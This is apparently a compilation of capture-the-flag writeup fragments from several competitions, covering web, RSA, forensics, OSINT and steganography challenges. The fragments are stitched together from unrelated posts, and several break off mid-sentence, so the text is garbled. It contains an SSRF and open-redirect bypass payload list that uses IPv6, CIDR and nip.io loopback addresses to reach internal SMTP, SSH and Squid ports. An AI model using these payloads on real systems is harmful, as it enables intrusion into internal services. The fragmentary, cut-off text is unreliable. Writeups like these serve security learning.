Web Writeups
Hello there, we (fr334aks) took part in HackPack CTF 2021 and ended up solving all the available Web challenges. Here are our writeups for them.
"N"ot "G"am"I"ng a"N"ymore in "X"mas
Challenge Solution
Tried a random name as the password and used the Network tab in the browser's developer tools to inspect the requests. Found a POST request with the data debug=0 and changed that to debug=1, which revealed the default nginx.
SSRF
Hello there, below is a list of the most common SSRF payloads and open-redirect bypasses.
SSRF & Open Redirect Bypass
With [::], abuses IPv6
http://[::]/
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
http://0000::1/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
With domain redirection, useful when all IP addresses are blacklisted
http://localtest.me
http://test.app.127.0.0.1.nip.io
http://test-app-127-0-0-1.nip.io
httP://test.app.127.0.0.1.xip.io
With CIDR, useful when just 127.0.0.1 is whitelisted
http://127.127.127.127/
http://127.0.1.3/
https:/127.0.0.0/
With IPv6/IPv4 address embedding, useful when both IPv4 and IPv6 are blacklisted (but blacklisted badly)
http://[0:0:0:0:0:ffff:127.
Hello there, Angstrom 2021 just concluded. With that, here are some of the writeups that I happened to have a hand in solving and found interesting.
Sosig
We are given the following numbers to retrieve the flag from. Having no source file, we kick into research on RSA encryption. This challenge has a weird length of the exponent (e);
on researching, we found out it might be vulnerable to a Wiener attack.
We first verify that the Wiener attack can be applied:
Shakti took place over the weekend and I happened to miss out, but I got a memory forensics challenge before it ended and I found it interesting.
Challenge
Help Me 400 re memory
Our department had taken up the responsibility of solving a mysterious case but unfortunately our system crashed. We could only recover this memory dump. Your job is to get all the important files from the system and use the files to find out the secret information.
Forbidden
points 100
challenge description
Agent Troll received some file but not able to read the data can you help us?
Author: White_Wolf
Forbidden (link is dead but file is attached)
solution
we are given a trollcats.car

$file trollcats.car
trollcats.car: data

on further investigation

$binwalk trollcats.car
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
50            0x32            bzip2 compressed data, block size = 900k

extracting the file

$binwalk -e trollcats.car
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
50            0x32            bzip2 compressed data, block size = 900k

┌─[@parrot]─[~/Desktop/CTFs/TrollCAT/Forensics]
└──╼ $cd _trollcats.
RaziCTF-Writeups Holloway Holloway OSINT
Challenge Solution following the provided challenge link
https://dikelaw535.wixsite.com/holloway we are met with the following web page
That ain’t good :/ No secrets yet … hh, but again maybe it was there but deleted :) Checking through using the Wayback Machine, we get something:
a Twitter handle, @juliusKingsleyy. Following the link
https://twitter.com/juliusKingsleyy
we are met with the following page, just a weird looking tweet
aha!
the challenge name is a hint for Twitter Steganography technique.
Echoes of Reality
Challenge Solution
The challenge was quite easy and direct: opening the file in Sonic Visualiser gives us the flag hidden in the spectrogram.
flag: flag{b3h1Nd_tH3_l0ok1nG_gl4s5}

Granular Data
Challenge Solution
Also an easy challenge; the flag was hidden in the metadata/EXIF data.
exiftool Garrett.png gives the flag
flag: flag{h4t3d_1n_th3_n4t10n_0MTBu}

Zima Blue Misc/Steg
points 100
Challenge Solution
This was an interesting stego challenge; opening the file in Stegsolve gives us the flag in plain text.